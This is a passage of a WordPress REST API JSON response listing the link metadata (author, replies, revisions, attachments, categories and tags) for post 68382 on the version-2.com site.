"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/users\/149011790"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/comments?post=68382"}],"version-history":[{"count":12,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/68382\/revisions"}],"predecessor-version":[{"id":69373,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/posts\/68382\/revisions\/69373"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/media?parent=68382"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/categories?post=68382"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/en\/wp-json\/wp\/v2\/tags?post=68382"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}